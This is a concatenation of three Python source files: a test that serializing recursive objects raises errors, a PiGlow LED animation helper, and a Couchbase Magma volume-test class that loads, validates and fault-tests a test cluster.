def test_serialize_recursive_objects():
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Make a numpy array that contains itself.
arr = np.array([None], dtype=object)
arr[0] = arr
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1, arr]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
pa.serialize(obj).deserialize()
|
piglowui.py
|
#!/usr/bin/python
#
# Copyright 2016 Deany Dean
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import piglow
from multiprocessing import Process, Queue
from Queue import Full, Empty
from time import sleep
#
# Piglow UI utils for piglow-sys library.
#
def start(clear=True):
""" Start PiGlow UI updates """
if _enabled:
return
if clear:
_change_task("_clear_all")
_change_task("_enable")
_start_updater()
def stop(clear=True):
""" Stop any PiGlow UI updates """
if clear:
_change_task("_clear_all")
_change_task("_disable")
def clear_all():
""" Clear all LEDs """
_change_task("_clear_all")
def pulse_color(color, speed=10, low=64, high=255):
""" Pulse each LED of the defined color at the defined speed. """
_change_task("_pulse_color", [color, speed, low, high], True)
def set_color(color, value):
""" Set the value of the defined color """
_change_task("_set_color", [color, value])
def cycle(leds, speed=10, low=0, high=255):
""" Cycle each LED from low to high in order """
_change_task("_cycle", [leds, speed, low, high], True)
def dim(led, speed=2, high=255, low=0):
""" Dims the LED from high to low at the given speed """
_change_task("_dim", [led, speed, high, low], True)
def set(leds, value):
""" Sets the value of each led """
_change_task("_set", [leds, value])
def pulse(led, speed=2, low=0, high=255):
""" Pulse the LED from low to high at the given speed """
_change_task("_pulse", [led, speed, low, high], True)
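# Illustrative usage sketch (assumes a PiGlow board is attached; uses only the
# public functions defined above, with hypothetical arguments):
#
#   start()                           # spawn the background updater process
#   pulse_color("red", speed=20)      # queue a repeating pulse task
#   cycle(range(0, 18), speed=15)     # later, cycle through all 18 LEDs
#   stop()                            # clear the LEDs and stop updates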
#
# Private functions to drive the UI (ie, PiGlow updates)
#
_enabled = False
_task_queue = Queue()
_updater_process = None
_NOTASK_SLEEP_INTERVAL = 1
def _enable():
""" Enable the PiGlow UI updates """
global _enabled
_enabled = True
def _disable():
""" Disable the PiGlow UI updates """
global _enabled
_enabled = False
def _change_task(task, args=[], repeat=False, interval=0):
""" Change the current task """
try:
_task_queue.put([task, args, repeat, interval])
except Full:
print "Task ", task, " failed. Task queue full"
return
def _handle_tasks(tasks):
""" Perform the UI update for the current task """
global _enabled
task = None
_enabled = True
while _enabled:
try:
task = tasks.get(False)
except Empty:
# Do nothing, this is a valid state
pass
# If we have no task, just sleep for an interval and read again
if task is None:
sleep(_NOTASK_SLEEP_INTERVAL)
continue
# Get and exec the task method
task_method = globals().get(task[0])
if task_method is None:
sleep(task[3])
continue
else:
task_method(*task[1])
if not task[2]:
task = None
def _start_updater():
""" Start an updater process if there isn't already one """
global _updater_process
# If already enabled, just return
if _enabled:
return
_updater_process = Process(target=_handle_tasks, args=(_task_queue,))
_updater_process.start()
#
# API drawing task functions
#
def _clear_all():
""" Clear all LEDs """
for l in range(0, 18):
piglow.set(l, 0)
piglow.show()
def _set_color(color, value):
""" Set the value of the defined color """
color_setter = getattr(piglow, color)
color_setter(value)
piglow.show()
def _pulse_color(color, speed, low, high):
""" Pulse each LED of the defined color at the given speed """
color_setter = getattr(piglow, color)
pulse_range = range(low, high)
wait_for = 1.0/speed
for c in pulse_range:
color_setter(c)
piglow.show()
sleep(wait_for)
for c in reversed(pulse_range):
color_setter(c)
piglow.show()
sleep(wait_for)
def _pulse(led, speed, low, high):
""" Pulse the LED from low to high """
pulse_range = range(low, high)
wait_for = 1.0/speed
for c in pulse_range:
piglow.set(led, c)
piglow.show()
sleep(wait_for)
for c in reversed(pulse_range):
piglow.set(led, c)
piglow.show()
sleep(wait_for)
def _set(leds, value):
""" Sets the value of each led """
for led in leds:
piglow.set(led, value)
piglow.show()
def _dim(led, speed, high, low):
""" Dims the led from high to low at the given speed """
dim_range = range(low, high)
wait_for = 1.0/speed
for c in reversed(dim_range):
piglow.set(led, c)
piglow.show()
sleep(wait_for)
def _cycle(leds, speed, low, high):
""" Cycle each LED from low to high in order """
pulse_range = range(low, high)
wait_for = 1.0/speed
# Set each LED to the LOW state
_set(leds, low)
for i in range(0, len(leds)):
for c in pulse_range:
# Increase the LED to HIGH
piglow.set(leds[i], c)
piglow.show()
sleep(wait_for)
# Decrease the previous LED back to LOW at same rate
if i > 0:
piglow.set(leds[i-1], high-(c-low))
piglow.show()
sleep(wait_for)
# Decrease the final LED back to LOW state
_dim(leds[-1], speed, high, low)
# Set each LED to the LOW state
_set(leds, low)
|
Magma.py
|
'''
Created on Mar 29, 2020
@author: riteshagarwal
'''
import random
from BucketLib.BucketOperations import BucketHelper
from BucketLib.bucket import Bucket
from TestInput import TestInputSingleton
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import doc_generator
from error_simulation.cb_error import CouchbaseError
from membase.api.rest_client import RestConnection, RestHelper
from remote.remote_util import RemoteMachineShellConnection
from sdk_exceptions import SDKException
from table_view import TableView
from Cb_constants.CBServer import CbServer
import os
from memcached.helper.data_helper import MemcachedClientHelper
from cb_tools.cbstats import Cbstats
import threading
import time
from custom_exceptions.exception import RebalanceFailedException
import math
import subprocess
from math import ceil
from Jython_tasks.task_manager import TaskManager as local_tm
import copy
from com.couchbase.test.taskmanager import TaskManager
from com.couchbase.test.sdk import Server, SDKClient
from com.couchbase.test.sdk import SDKClient as NewSDKClient
from com.couchbase.test.docgen import WorkLoadSettings,\
DocumentGenerator
from com.couchbase.test.loadgen import WorkLoadGenerate
from com.couchbase.test.docgen import DocRange
from java.util import HashMap
from couchbase.test.docgen import DRConstants
from com.couchbase.test.key import SimpleKey
from com.couchbase.client.core.error import DocumentExistsException,\
TimeoutException, DocumentNotFoundException, ServerOutOfMemoryException
class volume(BaseTestCase):
def init_doc_params(self):
self.create_perc = 100
self.update_perc = self.input.param("update_perc", 50)
self.delete_perc = self.input.param("delete_perc", 50)
self.expiry_perc = self.input.param("expiry_perc", 0)
self.read_perc = self.input.param("read_perc", 100)
self.start = 0
self.end = 0
self.initial_items = self.start
self.final_items = self.end
self.create_end = 0
self.create_start = 0
self.read_start = 0
self.read_end = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
def setUp(self):
BaseTestCase.setUp(self)
self.init_doc_params()
self.num_collections = self.input.param("num_collections", 1)
self.num_scopes = self.input.param("num_scopes", 1)
self.num_buckets = self.input.param("num_buckets", 1)
self.doc_ops = self.input.param("doc_ops", "create")
self.mutation_perc = 100
if self.doc_ops:
self.doc_ops = self.doc_ops.split(':')
self.max_tasks_per_collection = 8
process_concurrency = int(math.ceil(self.max_tasks_per_collection /
float(len(self.doc_ops))))
process_concurrency = self.input.param("pc", process_concurrency)
doc_tasks = (self.num_buckets*self.num_scopes*self.num_collections) * len(self.doc_ops) * process_concurrency + 2
self.thread_to_use = min(64, doc_tasks)
self.input.test_params.update({"threads_to_use":
self.thread_to_use})
self.log.critical("Total Doc-Tasks workers = %s" % self.thread_to_use)
self.log.critical("Total Doc-Tasks = %s" % doc_tasks)
self.doc_loading_tm = local_tm(number_of_threads=self.thread_to_use)
self.process_concurrency = self.input.param("pc", process_concurrency)
self.rest = RestConnection(self.servers[0])
self.op_type = self.input.param("op_type", "create")
self.dgm = self.input.param("dgm", None)
self.available_servers = self.cluster.servers[self.nodes_init:]
self.num_buckets = self.input.param("num_buckets", 1)
self.mutate = 0
self.iterations = self.input.param("iterations", 2)
self.step_iterations = self.input.param("step_iterations", 1)
self.rollback = self.input.param("rollback", True)
self.vbucket_check = self.input.param("vbucket_check", True)
self.new_num_writer_threads = self.input.param(
"new_num_writer_threads", 6)
self.new_num_reader_threads = self.input.param(
"new_num_reader_threads", 8)
self.end_step = self.input.param("end_step", None)
self.key_prefix = "Users"
self.crashes = self.input.param("crashes", 20)
self.check_dump_thread = True
self.skip_read_on_error = False
self.suppress_error_table = False
self.track_failures = True
self.loader_dict = None
self.parallel_reads = self.input.param("parallel_reads", False)
self._data_validation = self.input.param("data_validation", True)
self.disable_magma_commit_points = self.input.param(
"disable_magma_commit_points", False)
self.fragmentation = int(self.input.param("fragmentation", 50))
self.cursor_dropping_checkpoint = self.input.param(
"cursor_dropping_checkpoint", None)
self.assert_crashes_on_load = self.input.param("assert_crashes_on_load",
True)
#######################################################################
self.PrintStep("Step 1: Create a %s node cluster" % self.nodes_init)
if self.nodes_init > 1:
nodes_init = self.cluster.servers[1:self.nodes_init]
self.task.rebalance([self.cluster.master], nodes_init, [])
self.cluster.nodes_in_cluster.extend(
[self.cluster.master] + nodes_init)
else:
self.cluster.nodes_in_cluster.extend([self.cluster.master])
self.cluster_util.set_metadata_purge_interval(self.cluster.master)
#######################################################################
self.PrintStep("Step 2: Create required buckets and collections.")
self.create_required_buckets()
props = "magma"
update_bucket_props = False
if self.disable_magma_commit_points:
props += ";magma_max_commit_points=0"
update_bucket_props = True
if self.cursor_dropping_checkpoint:
props += ";cursor_dropping_checkpoint_mem_upper_mark=%s" %\
str(self.cursor_dropping_checkpoint)
update_bucket_props = True
if update_bucket_props:
self.bucket_util.update_bucket_props(
"backend", props,
self.cluster, self.cluster.buckets)
self.sleep(10, "Sleep for 10 seconds so that collections \
can be created")
else:
for node in self.servers:
shell = RemoteMachineShellConnection(node)
shell.enable_diag_eval_on_non_local_hosts()
shell.disconnect()
self.scope_name = self.input.param("scope_name",
CbServer.default_scope)
if self.scope_name != CbServer.default_scope:
self.bucket_util.create_scope(self.cluster.master,
self.bucket,
{"name": self.scope_name})
if self.num_scopes > 1:
self.scope_prefix = self.input.param("scope_prefix",
"VolumeScope")
for bucket in self.cluster.buckets:
for i in range(self.num_scopes):
scope_name = self.scope_prefix + str(i)
self.log.info("Creating scope: %s"
% (scope_name))
self.bucket_util.create_scope(self.cluster.master,
bucket,
{"name": scope_name})
self.sleep(0.5)
self.num_scopes += 1
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
if self.num_collections >= 1:
self.collection_prefix = self.input.param("collection_prefix",
"VolumeCollection")
for i in range(self.num_collections):
collection_name = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection_name})
self.sleep(0.5)
# self.num_collections += 1
self.rest = RestConnection(self.cluster.master)
self.assertTrue(self.rest.update_autofailover_settings(False, 600),
"AutoFailover disabling failed")
if self.sdk_client_pool:
max_clients = min(self.task_manager.number_of_threads,
20)
clients_per_bucket = int(ceil(max_clients / self.num_buckets))
for bucket in self.cluster.buckets:
self.sdk_client_pool.create_clients(
bucket,
[self.cluster.master],
clients_per_bucket,
compression_settings=self.sdk_compression)
self.retry_exceptions = None
self.ignore_exceptions = None
self.key_type = self.input.param("key_type", "SimpleKey")
self.ops_rate = self.input.param("ops_rate", 10000)
def tearDown(self):
self.check_dump_thread = False
self.stop_crash = True
BaseTestCase.tearDown(self)
def get_memory_footprint(self):
out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],stdout=subprocess.PIPE).communicate()[0].split(b'\n')
rss_index = out[0].split().index(b'RSS')
mem = float(out[1].split()[rss_index]) / 1024
self.PrintStep("RAM FootPrint: %s" % str(mem))
return mem
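# Note on the assumption behind get_memory_footprint (illustrative, Linux/procps
# only): `ps v -p <pid>` prints a header line such as
#   PID TTY STAT TIME MAJFL TRS DRS RSS %MEM COMMAND
# and the code above locates the RSS column from that header, reads the value
# (in KiB) from the data row, and divides by 1024 to report MiB.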
def create_required_buckets(self):
self.log.info("Get the available memory quota")
self.info = self.rest.get_nodes_self()
# threshold_memory_vagrant = 100
kv_memory = self.info.memoryQuota - 100
# Creating buckets for data loading purpose
self.log.info("Create CB buckets")
self.bucket_expiry = self.input.param("bucket_expiry", 0)
ramQuota = self.input.param("ramQuota", kv_memory)
buckets = ["GleamBookUsers"]*self.num_buckets
self.bucket_type = self.bucket_type.split(';')*self.num_buckets
self.compression_mode = self.compression_mode.split(';')*self.num_buckets
self.bucket_eviction_policy = self.bucket_eviction_policy
for i in range(self.num_buckets):
bucket = Bucket(
{Bucket.name: buckets[i] + str(i),
Bucket.ramQuotaMB: ramQuota/self.num_buckets,
Bucket.maxTTL: self.bucket_expiry,
Bucket.replicaNumber: self.num_replicas,
Bucket.storageBackend: self.bucket_storage,
Bucket.evictionPolicy: self.bucket_eviction_policy,
Bucket.bucketType: self.bucket_type[i],
Bucket.flushEnabled: Bucket.FlushBucket.ENABLED,
Bucket.compressionMode: self.compression_mode[i],
Bucket.fragmentationPercentage: self.fragmentation})
self.bucket_util.create_bucket(self.cluster, bucket)
# rebalance the new buckets across all nodes.
self.log.info("Rebalance Starts")
self.nodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[])
self.rest.monitorRebalance()
def set_num_writer_and_reader_threads(self, num_writer_threads="default",
num_reader_threads="default"):
for node in self.cluster_util.get_kv_nodes(self.cluster):
bucket_helper = BucketHelper(node)
bucket_helper.update_memcached_settings(
num_writer_threads=num_writer_threads,
num_reader_threads=num_reader_threads)
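    # Work out the key ranges for each requested doc operation. Explicit
    # *_start/*_end arguments take precedence; otherwise the ranges are
    # derived from num_items, mutation_perc and the running self.start /
    # self.end cursors, and self.final_items is updated to the item count
    # expected after the load completes.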
def generate_docs(self, doc_ops=None,
create_end=None, create_start=None,
update_end=None, update_start=None,
delete_end=None, delete_start=None,
expire_end=None, expire_start=None,
read_end=None, read_start=None):
self.get_memory_footprint()
self.create_end = 0
self.create_start = 0
self.read_end = 0
self.read_start = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
self.initial_items = self.final_items
doc_ops = doc_ops or self.doc_ops
self.mutations_to_validate = doc_ops
if "read" in doc_ops:
if read_start is not None:
self.read_start = read_start
else:
self.read_start = 0
if read_end is not None:
self.read_end = read_end
else:
self.read_end = self.num_items * self.mutation_perc/100
if "update" in doc_ops:
if update_start is not None:
self.update_start = update_start
else:
self.update_start = 0
if update_end is not None:
self.update_end = update_end
else:
self.update_end = self.num_items * self.mutation_perc/100
self.mutate += 1
if "delete" in doc_ops:
if delete_start is not None:
self.delete_start = delete_start
else:
self.delete_start = self.start
if delete_end is not None:
self.delete_end = delete_end
else:
self.delete_end = self.start + self.num_items * self.mutation_perc/100
self.final_items -= (self.delete_end - self.delete_start) * self.num_collections * self.num_scopes
if "expiry" in doc_ops:
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
if expire_start is not None:
self.expire_start = expire_start
else:
self.expire_start = self.delete_end
if expire_end is not None:
self.expire_end = expire_end
else:
                self.expire_end = self.expire_start + self.num_items * self.mutation_perc/100
self.final_items -= (self.expire_end - self.expire_start) * self.num_collections * self.num_scopes
if "create" in doc_ops:
if create_start is not None:
self.create_start = create_start
else:
self.create_start = self.end
self.start = self.create_start
if create_end is not None:
self.create_end = create_end
else:
self.create_end = self.end + (self.expire_end - self.expire_start) + (self.delete_end - self.delete_start)
self.end = self.create_end
self.final_items += (abs(self.create_end - self.create_start)) * self.num_collections * self.num_scopes
print "Read Start: %s" % self.read_start
print "Read End: %s" % self.read_end
print "Update Start: %s" % self.update_start
print "Update End: %s" % self.update_end
print "Delete Start: %s" % self.delete_start
print "Delete End: %s" % self.delete_end
print "Expiry End: %s" % self.expire_start
print "Expiry End: %s" % self.expire_end
print "Create Start: %s" % self.create_start
print "Create End: %s" % self.create_end
print "Final Start: %s" % self.start
print "Final End: %s" % self.end
def data_load(self, cmd=dict()):
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", self.create_perc),
cmd.get("rd", self.read_perc),
cmd.get("up", self.update_perc),
cmd.get("dl", self.delete_perc),
cmd.get("ex", self.expiry_perc),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", False),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0)
)
hm = HashMap()
hm.putAll({DRConstants.create_s: self.create_start,
DRConstants.create_e: self.create_end,
DRConstants.update_s: self.update_start,
DRConstants.update_e: self.update_end,
DRConstants.expiry_s: self.expire_start,
DRConstants.expiry_e: self.expire_end,
DRConstants.delete_s: self.delete_start,
DRConstants.delete_e: self.delete_end,
DRConstants.read_s: self.read_start,
DRConstants.read_e: self.read_end})
dr = DocRange(hm)
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Loader_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection],
client, self.durability_level,
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
return tasks
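    # Wait for all loader tasks to finish, retry each failed mutation once
    # directly through the doc-ops API (ignoring already-exists / not-found
    # races), then optionally wait for and verify bucket item counts,
    # dumping memcached GDB backtraces if that verification fails.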
def wait_for_doc_load_completion(self, tasks, wait_for_stats=True):
self.tm.getAllTaskResult()
for task in tasks:
task.result = True
for optype, failures in task.failedMutations.items():
for failure in failures:
print("Test Retrying {}: {} -> {}".format(optype, failure.id(), failure.err().getClass().getSimpleName()))
if optype == "create":
try:
                        task.docops.insert(failure.id(), failure.document(), task.sdk.connection, task.setOptions)
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry Create failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "update":
try:
                        task.docops.upsert(failure.id(), failure.document(), task.sdk.connection, task.upsertOptions)
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry update failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "delete":
try:
                        task.docops.delete(failure.id(), task.sdk.connection, task.removeOptions)
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry delete failed for key: " + failure.id())
task.result = False
except DocumentNotFoundException as e:
pass
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
self.assertTrue(task.result, "Task Failed: {}".format(task.taskName))
if wait_for_stats:
try:
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=1200)
self.bucket_util.verify_stats_all_buckets(self.cluster, self.final_items)
except Exception as e:
self.get_gdb()
raise e
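    # Capture "thread apply all bt" output from the memcached process on
    # every node in the cluster; used for post-mortem logging when the
    # stats verification above fails.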
def get_gdb(self):
for node in self.cluster.nodes_in_cluster:
gdb_shell = RemoteMachineShellConnection(node)
gdb_out = gdb_shell.execute_command('gdb -p `(pidof memcached)` -ex "thread apply all bt" -ex detach -ex quit')[0]
self.log.critical("GDB bt logs from node: %s\n %s"
% (node.ip, gdb_out))
gdb_shell.disconnect()
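    # Validate mutations by re-reading every mutated range with read-only,
    # validation-enabled workloads: created/updated docs must exist with the
    # expected content, deleted docs must be absent.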
def data_validation(self):
doc_ops = self.mutations_to_validate
if self._data_validation:
self.log.info("Validating Active/Replica Docs")
cmd = dict()
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
cmd.update({"deleted": False})
hm = HashMap()
if op_type == "create":
hm.putAll({DRConstants.read_s: self.create_start,
DRConstants.read_e: self.create_end})
elif op_type == "update":
hm.putAll({DRConstants.read_s: self.update_start,
DRConstants.read_e: self.update_end})
elif op_type == "delete":
hm.putAll({DRConstants.read_s: self.delete_start,
DRConstants.read_e: self.delete_end})
cmd.update({"deleted": True})
else:
continue
dr = DocRange(hm)
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", 0),
cmd.get("rd", 100),
cmd.get("up", 0),
cmd.get("dl", 0),
cmd.get("ex", 0),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", True),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0))
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection+op_type: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
if op_type not in ["create", "update", "delete"]:
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Validate_%s_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, op_type, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection+op_type],
client, "NONE",
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
self.tm.getAllTaskResult()
for task in tasks:
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
for task in tasks:
self.assertTrue(task.result, "Validation Failed for: %s" % task.taskName)
def get_bucket_dgm(self, bucket):
self.rest_client = BucketHelper(self.cluster.master)
count = 0
dgm = 100
while count < 5:
try:
dgm = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Active Resident Threshold of {0} is {1}".format(
bucket.name, dgm))
return dgm
except Exception as e:
self.sleep(5, e)
count += 1
return dgm
    def _induce_error(self, error_condition, nodes=None):
nodes = nodes or [self.cluster.master]
for node in nodes:
if error_condition == "stop_server":
self.cluster_util.stop_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.start_firewall_on_node(self.cluster, node)
elif error_condition == "kill_memcached":
self.cluster_util.kill_memcached(self.cluster, node=node)
elif error_condition == "reboot_server":
shell = RemoteMachineShellConnection(node)
shell.reboot_node()
elif error_condition == "kill_erlang":
shell = RemoteMachineShellConnection(node)
shell.kill_erlang()
self.sleep(self.sleep_time * 3)
shell.disconnect()
else:
self.fail("Invalid error induce option")
def _recover_from_error(self, error_condition):
for node in self.cluster.nodes_in_cluster:
if error_condition == "stop_server" or error_condition == "kill_erlang":
self.cluster_util.start_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.stop_firewall_on_node(self.cluster, node)
for node in self.cluster.nodes_in_cluster:
result = self.cluster_util.wait_for_ns_servers_or_assert([node],
wait_time=1200)
self.assertTrue(result, "Server warmup failed")
self.check_warmup_complete(node)
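    # Start an async rebalance that adds nodes_in random spare servers and
    # removes nodes_out random non-master nodes, updating available_servers
    # and cluster.nodes_in_cluster to reflect the intended end state.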
def rebalance(self, nodes_in=0, nodes_out=0,
retry_get_process_num=3000):
self.servs_in = random.sample(self.available_servers, nodes_in)
self.nodes_cluster = self.cluster.nodes_in_cluster[:]
self.nodes_cluster.remove(self.cluster.master)
self.servs_out = random.sample(self.nodes_cluster, nodes_out)
if nodes_in == nodes_out:
self.vbucket_check = False
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init],
self.servs_in, self.servs_out,
check_vbucket_shuffling=self.vbucket_check,
retry_get_process_num=retry_get_process_num)
self.available_servers = [servs for servs in self.available_servers
if servs not in self.servs_in]
self.available_servers += self.servs_out
self.cluster.nodes_in_cluster.extend(self.servs_in)
self.cluster.nodes_in_cluster = list(set(self.cluster.nodes_in_cluster)
- set(self.servs_out))
return rebalance_task
def print_crud_stats(self):
self.table = TableView(self.log.info)
self.table.set_headers(["Initial Items",
"Current Items",
"Items Updated",
"Items Created",
"Items Deleted",
"Items Expired"])
self.table.add_row([
str(self.initial_items),
str(self.final_items),
str(abs(self.update_start)) + "-" + str(abs(self.update_end)),
str(abs(self.create_start)) + "-" + str(abs(self.create_end)),
str(abs(self.delete_start)) + "-" + str(abs(self.delete_end)),
str(abs(self.expire_start)) + "-" + str(abs(self.expire_end))
])
self.table.display("Docs statistics")
def perform_load(self, crash=False, num_kills=1, wait_for_load=True,
validate_data=True):
task = self.data_load()
if wait_for_load:
self.wait_for_doc_load_completion(task)
else:
return task
if crash:
self.kill_memcached(num_kills=num_kills)
if validate_data:
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
def print_stats(self):
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
self.check_fragmentation_using_magma_stats(bucket)
self.check_fragmentation_using_kv_stats(bucket)
def check_fragmentation_using_kv_stats(self, bucket, servers=None):
result = dict()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
frag_val = self.bucket_util.get_fragmentation_kv(
self.cluster, bucket, server)
self.log.debug("Current Fragmentation for node {} is {} \
".format(server.ip, frag_val))
result.update({server.ip: frag_val})
self.log.info("KV stats fragmentation values {}".format(result))
def check_fragmentation_using_magma_stats(self, bucket, servers=None):
result = dict()
stats = list()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
fragmentation_values = list()
shell = RemoteMachineShellConnection(server)
output = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
self.log.debug("machine: {} - core(s): {}".format(server.ip,
output))
for i in range(min(int(output), 64)):
grep_field = "rw_{}:magma".format(i)
_res = self.get_magma_stats(bucket, shell,
field_to_grep=grep_field)
fragmentation_values.append(float(_res[server.ip][grep_field]
["Fragmentation"]))
stats.append(_res)
result.update({server.ip: fragmentation_values})
shell.disconnect()
res = list()
for value in result.values():
res.append(max(value))
if max(res) < float(self.fragmentation)/100:
self.log.info("magma stats fragmentation result {} \
".format(result))
return True
self.log.info("magma stats fragmentation result {} \
".format(result))
self.log.info(stats)
return False
def get_magma_stats(self, bucket, shell=None, field_to_grep=None):
magma_stats_for_all_servers = dict()
cbstat_obj = Cbstats(shell)
result = cbstat_obj.magma_stats(bucket.name,
field_to_grep=field_to_grep)
magma_stats_for_all_servers[shell.ip] = result
return magma_stats_for_all_servers
def get_magma_disk_usage(self, bucket=None):
if bucket is None:
bucket = self.bucket
servers = self.cluster.nodes_in_cluster
kvstore = 0
wal = 0
keyTree = 0
seqTree = 0
data_files = 0
for server in servers:
shell = RemoteMachineShellConnection(server)
bucket_path = os.path.join(RestConnection(server).get_data_path(),bucket.name)
kvstore += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*"))[0][0].split('\n')[0])
wal += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/wal"))[0][0].split('\n')[0])
keyTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/key*"))[0][0].split('\n')[0])
seqTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/seq*"))[0][0].split('\n')[0])
cmd = 'find ' + bucket_path + '/magma*/ -maxdepth 1 -type d \
-print0 | while read -d "" -r dir; do files=("$dir"/*/*/*); \
printf "%d,%s\n" "${#files[@]}" "$dir"; done'
data_files = shell.execute_command(cmd)[0]
for files in data_files:
if "kvstore" in files and int(files.split(",")[0]) >= 300:
self.log.warn("Number of files in {}--{} is {}".format(
server.ip, files.split(",")[1].rstrip(), files.split(",")[0]))
shell.disconnect()
self.log.debug("Total Disk usage for kvstore is {}MB".format(kvstore))
self.log.debug("Total Disk usage for wal is {}MB".format(wal))
self.log.debug("Total Disk usage for keyTree is {}MB".format(keyTree))
